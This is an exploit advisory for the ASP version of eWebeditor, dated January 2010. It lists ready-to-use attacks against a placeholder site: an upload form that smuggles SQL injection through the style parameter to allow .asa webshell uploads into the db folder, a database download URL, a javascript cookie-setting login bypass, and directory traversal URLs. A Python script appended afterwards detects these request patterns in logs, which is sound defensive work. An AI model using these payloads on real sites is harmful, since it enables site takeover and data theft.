#################################################################
# Application Info:
# Name: eWebeditor
# Version: ASP
#################################################################
Vulnerability:

=======================
Arbitrary File Upload
=======================
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye ’union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b’ / .. / db ’, S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b’ | asa ’, S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =’ standard ’and’a’ = ’a "method = post name = myform enctype=" multipart / form−data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload> </p>
</form>


=======================
Arbitrary File Upload 2
=======================
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup


=======================
Database Disclosure
=======================
http://site.com/ewebeditor/db/ewebeditor.mdb


=======================
Administrator bypass
=======================
http://site.com/eWebEditor/admin/login.asp

Put this code in place of the URL:
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));


=======================
Directory Traversal
=======================
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..


=======================
Directory Traversal 2
=======================
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..
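
Added example, not part of the original advisory: a log triage script that flags the request patterns listed above (SQL syntax in the style parameter, ".." in the dir parameter, direct .mdb download, and the adminpass cookie value). The log layout, rule names and sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines; assumed layout: METHOD PATH QUERY COOKIE ("-" = empty).
SAMPLE = [
    "GET /ewebeditor/asp/browse.asp style=standard650&dir=./.. -",
    "GET /ewebeditor/asp/browse.asp style=standard650&dir=images -",
    "GET /ewebeditor/db/ewebeditor.mdb - -",
    "POST /manage/ewebeditor/upload.asp action=save&type=IMAGE"
    "&style=luoye'+union+select+S_ID+from+ewebeditor_style -",
    "GET /eWebEditor/admin/login.asp - adminpass=admin",
    "GET /index.asp dir=.. -",
]


def classify(line):
    """Return the sorted rule names (this example's own labels) one line triggers."""
    method, stem, query, cookie = line.split(" ", 3)
    path = stem.lower()
    if "ewebeditor" not in path:
        return []  # only requests under an eWebEditor directory are in scope
    params = parse_qs("" if query == "-" else query)  # decodes %xx and '+'
    hits = set()
    # A style name should be a plain identifier; quotes or UNION SELECT are not.
    for value in params.get("style", []):
        if "'" in value or re.search(r"\bunion\b.*\bselect\b", value, re.I):
            hits.add("style-sqli")
    # A dir value with a ".." path segment climbs out of the upload directory.
    for value in params.get("dir", []):
        if ".." in value.replace("\\", "/").split("/"):
            hits.add("dir-traversal")
    # The Access database must never be fetched over HTTP.
    if path.endswith(".mdb"):
        hits.add("mdb-download")
    # Heuristic: the exact cookie value the bypass sets, sent to an admin page.
    if "/admin/" in path and re.search(r"\badminpass\s*=\s*admin\b", cookie, re.I):
        hits.add("adminpass-cookie")
    return sorted(hits)


def scan(lines):
    """Map each flagged log line to the rules it triggered."""
    return {line: hits for line in lines if (hits := classify(line))}


if __name__ == "__main__":
    for line, hits in scan(SAMPLE).items():
        print(", ".join(hits), "<-", line)
```
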
Page 1/2
eWebeditor ASP Version Multiple Vulnerabilities
N/A
01/29/2010